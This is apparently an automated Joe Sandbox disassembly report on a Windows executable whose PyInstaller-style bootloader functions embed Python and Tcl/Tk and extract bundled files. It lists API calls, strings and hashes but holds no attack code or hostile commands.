%hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-2007157414
Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction ID: 7648b33edeb82bdd0ab73a370428ccc24d8207c64474ae216970e21b1c2e257d
Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction Fuzzy Hash: DF12A465D0EB03F1FA7A9BB5A8509B423A1EF0C749B9414B5D80ED63A8EF3CF5489340

Function 00007FF690016EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF690016EB7
GetProcAddress.KERNEL32 ref: 00007FF690016EFD
GetProcAddress.KERNEL32 ref: 00007FF690016F22
GetProcAddress.KERNEL32 ref: 00007FF690016F47
GetProcAddress.KERNEL32 ref: 00007FF690016F6F
GetProcAddress.KERNEL32 ref: 00007FF690016F97
GetProcAddress.KERNEL32 ref: 00007FF690016FBF
GetProcAddress.KERNEL32 ref: 00007FF690016FE7
GetProcAddress.KERNEL32 ref: 00007FF69001700F

Strings

GetProcAddress, xrefs: 00007FF690016ED7
Tcl_GetObjResult, xrefs: 00007FF6900172AD, 00007FF6900172C9
Tcl_SetVar2, xrefs: 00007FF6900171BD, 00007FF6900171D9
Tcl_CreateThread, xrefs: 00007FF690016FDD, 00007FF690016FF9
Tcl_ThreadAlert, xrefs: 00007FF69001716D, 00007FF690017189
Tcl_FindExecutable, xrefs: 00007FF690016F18, 00007FF690016F34
Tcl_JoinThread, xrefs: 00007FF69001702D, 00007FF690017049
Tcl_Init, xrefs: 00007FF690016EB0, 00007FF690016EC9
Tcl_MutexFinalize, xrefs: 00007FF6900170A5, 00007FF6900170C1
Tcl_GetVar2, xrefs: 00007FF690017195, 00007FF6900171B1
Tcl_Free, xrefs: 00007FF690017375, 00007FF690017391
Tcl_ConditionWait, xrefs: 00007FF69001711D, 00007FF690017139
Tcl_GetString, xrefs: 00007FF69001720D, 00007FF690017229
Failed to get address for %hs, xrefs: 00007FF690016ED0
Tcl_FinalizeThread, xrefs: 00007FF690016F8D, 00007FF690016FA9
Tcl_Finalize, xrefs: 00007FF690016F65, 00007FF690016F81
Tcl_CreateObjCommand, xrefs: 00007FF6900171E5, 00007FF690017201
Tcl_ThreadQueueEvent, xrefs: 00007FF690017145, 00007FF690017161
Tcl_ConditionNotify, xrefs: 00007FF6900170F5, 00007FF690017111
Tcl_Alloc, xrefs: 00007FF69001734D, 00007FF690017369
Tcl_MutexLock, xrefs: 00007FF690017055, 00007FF690017071
Tcl_SetVar2Ex, xrefs: 00007FF690017285, 00007FF6900172A1
Tcl_EvalEx, xrefs: 00007FF6900172FD, 00007FF690017319
Tcl_NewByteArrayObj, xrefs: 00007FF69001725D, 00007FF690017279
Tcl_EvalFile, xrefs: 00007FF6900172D5, 00007FF6900172F1
Tk_GetNumMainWindows, xrefs: 00007FF6900173C5, 00007FF6900173E1
Tcl_MutexUnlock, xrefs: 00007FF69001707D, 00007FF690017099
Tcl_DoOneEvent, xrefs: 00007FF690016F3D, 00007FF690016F59
Tcl_ConditionFinalize, xrefs: 00007FF6900170CD, 00007FF6900170E9
Tk_Init, xrefs: 00007FF69001739D, 00007FF6900173B9
Tcl_DeleteInterp, xrefs: 00007FF690016FB5, 00007FF690016FD1
Tcl_GetCurrentThread, xrefs: 00007FF690017005, 00007FF690017021
Tcl_CreateInterp, xrefs: 00007FF690016EF3, 00007FF690016F0F
Tcl_EvalObjv, xrefs: 00007FF690017325, 00007FF690017341
Tcl_NewStringObj, xrefs: 00007FF690017235, 00007FF690017251

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-3427451314
Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction ID: 7c3918bf6be1ac06e90ac3ed181f4d6d5e203b6e854cd0e62e806de96d163347
Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction Fuzzy Hash: 54E1A96890DB03B1FA7AAB75B8505B523A5EF08758F9411B6D85EC23ACEF3CE558D300

Function 00007FF6900177D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF690017C97,?,?,FFFFFFFF,00007FF690013834), ref: 00007FF69001782C

Part of subcall function 00007FF6900126C0: MessageBoxW.USER32 ref: 00007FF690012736

Strings

CreateDirectory, xrefs: 00007FF690017974
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF69001789D
\, xrefs: 00007FF690017861
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF69001796D
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF690017840
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6900178D9
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF690017803
%.*s, xrefs: 00007FF69001790C

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
Instruction ID: ac90fb5e6628dfd6d958615af6f094d653f8b4ea7023b876f7e75e277221f3af
Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
Instruction Fuzzy Hash: 8041A321B1C643B1FBB1AB34E8556BA6261EF8878CF4444B2E64EC27DDEE3CE5458700

Function 00007FF6900120F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF69001211B
SelectObject.GDI32 ref: 00007FF690012162
DrawTextW.USER32 ref: 00007FF690012185
SelectObject.GDI32 ref: 00007FF69001219B
ReleaseDC.USER32 ref: 00007FF6900121AB
MoveWindow.USER32 ref: 00007FF6900121FB
MoveWindow.USER32 ref: 00007FF69001223B
MoveWindow.USER32 ref: 00007FF69001228E
MoveWindow.USER32 ref: 00007FF6900122D6

Strings

P%, xrefs: 00007FF69001216F

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
Instruction ID: 3d794453b29d6e52b5fef5efc14075ca947aac606ac034f791f3d8966fb337e9
Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
Instruction Fuzzy Hash: 9A510726604BA186D6349F36E4185BAB7A2FB98B65F004131EFDE83789DF3CD085CB10

Function 00007FF6900255A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 493COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6900255E3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6900259D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF690025C6C

Strings

:, xrefs: 00007FF69002579C
-, xrefs: 00007FF690025679
f, xrefs: 00007FF690025705
p, xrefs: 00007FF69002570D
p, xrefs: 00007FF690025695

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
Instruction ID: d53f21e28c4a279cb3c742a414f6095389497467c83ee6494f19ca4f6eeb2d2e
Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
Instruction Fuzzy Hash: 8A129061E0C243A6FB319A3DE0542797691FB40752F944176E689C7BCCEF3CE9828B08

Function 00007FF6900202E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF690020328
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6900206F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF69002098F

Strings

f, xrefs: 00007FF690020575
p, xrefs: 00007FF690020432
p, xrefs: 00007FF6900203CD
f, xrefs: 00007FF6900203C0
f, xrefs: 00007FF69002042A

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
Instruction ID: 0a7f252f09a8ebe5459d82713e5bfd62826b94b451eaf8231740437f5ab60462
Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
Instruction Fuzzy Hash: E312A572E0C343A6FB309A28E05477A7251FB80754F844076E69A877CEDF7CE5A68B50

Function 00007FF690011050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON

Download Yara Rule

Strings

fseek, xrefs: 00007FF6900110CC
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6900110F5
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6900111D0
Failed to extract %s: failed to open archive file!, xrefs: 00007FF690011097
malloc, xrefs: 00007FF6900110FC
fread, xrefs: 00007FF6900111D7
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6900110C5

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: c399ccfa1615de4e39718b025a1b3854e197f509e99eee99eeb70b724fa35d24
Instruction ID: 4ff96e2b5d55b41244753c365462c7c41f58a6b64fbfac0f938fdf32817bb11c
Opcode Fuzzy Hash: c399ccfa1615de4e39718b025a1b3854e197f509e99eee99eeb70b724fa35d24
Instruction Fuzzy Hash: A6417E21B0864272EA759B36A8406FAA3A5FF44BCCF544071EE4D87B9DEE3CE5458700

Function 00007FF690011440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON

Download Yara Rule

Strings

fseek, xrefs: 00007FF6900114B0
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6900114D9
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF69001159A
Failed to extract %s: failed to open archive file!, xrefs: 00007FF69001146F
malloc, xrefs: 00007FF6900114E0
fread, xrefs: 00007FF6900115A1
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6900114A9

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 9c62d6094ca81ecf2617bb82d10b75015b4188cea332ec045593c4b2de59fb31
Instruction ID: 4b6a3f4181b1ff05e52e113272ff9a4d96ae6244df6e8967a3e72cd431b6587c
Opcode Fuzzy Hash: 9c62d6094ca81ecf2617bb82d10b75015b4188cea332ec045593c4b2de59fb31
Instruction Fuzzy Hash: 5B419221B08A43A2EB759B35A4405FA63A5FF48BDCF544071EE4D87B9DEE3CE5418700

Function 00007FF69001DD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF69001DD85

Part of subcall function 00007FF69001ECDC: __GetUnwindTryBlock.LIBCMT ref: 00007FF69001ED1F
Part of subcall function 00007FF69001ECDC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF69001ED44

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF69001DE5D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF69001E0AB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF69001E1B8

Strings

csm, xrefs: 00007FF69001DD9F
csm, xrefs: 00007FF69001DE80
csm, xrefs: 00007FF69001DE06

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
Instruction ID: 7b7fc0d14f23e5e8cbccf311bdbe500c2db0c24baa8cb43b77b5408f9667c13a
Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
Instruction Fuzzy Hash: 85D18032A08781A6EBB09B75D4403AD7BA4FB5978CF100176EE4D97B9ADF38E491C740

Function 00007FF69001CFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D06D
GetLastError.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D07B
LoadLibraryExW.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D0A5
FreeLibrary.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D113
GetProcAddress.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D11F

Strings

api-ms-, xrefs: 00007FF69001D08D

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction ID: c14b94142e2d950d534a811ae49820a420fbbe260568b69c40cb5573b4195e73
Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction Fuzzy Hash: 8531B421A1AA42A1EE77DB66A4007752395FF0CBA8F590576EE1D87388EF7CE4428700

Function 00007FF69002A460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF69002A46F
FlsGetValue.KERNEL32 ref: 00007FF69002A484
FlsSetValue.KERNEL32 ref: 00007FF69002A4A5
FlsSetValue.KERNEL32 ref: 00007FF69002A4D2
FlsSetValue.KERNEL32 ref: 00007FF69002A4E3
FlsSetValue.KERNEL32 ref: 00007FF69002A4F4
SetLastError.KERNEL32 ref: 00007FF69002A50F

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 55a13e5d0c2be300fd0aa5feb7cab341fb5be024435351ef1c8ee5a0da484fed
Instruction ID: 19388cbea8efa2374654c0aacefefa60c5212b1b5965c82967659b45a91bd2f7
Opcode Fuzzy Hash: 55a13e5d0c2be300fd0aa5feb7cab341fb5be024435351ef1c8ee5a0da484fed
Instruction Fuzzy Hash: 73215E20B4C682A2FA78A339565957D6182EF897B0F1447B4E93EC7BDEDE6CF4024701

Function 00007FF69003707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6900370AD
GetLastError.KERNEL32 ref: 00007FF6900370B9
CloseHandle.KERNEL32 ref: 00007FF6900370D1
CreateFileW.KERNEL32 ref: 00007FF6900370FC
WriteConsoleW.KERNEL32 ref: 00007FF69003711B

Strings

CONOUT$, xrefs: 00007FF6900370DD

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction ID: 6f4386c37402aa6db2f2534a31a9692c62b08002f2a30eec1ce04c0af795c285
Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction Fuzzy Hash: C811D321B18A4196E3718B22E85472976A1FB9CBE4F400274EA1DC3798DF3CD400C744

Function 00007FF6900181F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF69001821D
K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF69001827A

Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9

K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF690018305
K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF690018364
FreeLibrary.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF690018375
FreeLibrary.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF69001838A

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: bfcefcadc4499c1de8e385cb70073816e38e2b1c8d4e625d2f32d7c46dc3e7cf
Instruction ID: 68c38ac7e61ed035dd068d7db7e4c83419e214784005ea1dbc459c319fa64fd5
Opcode Fuzzy Hash: bfcefcadc4499c1de8e385cb70073816e38e2b1c8d4e625d2f32d7c46dc3e7cf
Instruction Fuzzy Hash: B4418162A1968291EAB09B32A5412BA7394FF85FC8F484175DFAD9778DDF3CE601C700

Function 00007FF69002A5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A5E7
FlsSetValue.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A61D
